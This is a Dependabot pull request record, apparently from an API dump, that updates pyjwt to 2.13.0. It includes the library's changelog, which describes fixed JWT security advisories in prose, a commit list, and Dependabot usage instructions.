href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=uv\u0026previous-version=2.12.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/aaronsun0811-dot/scenelet-ai-video/pull/7","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aaronsun0811-dot%2Fscenelet-ai-video/issues/7","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7/packages"}}]}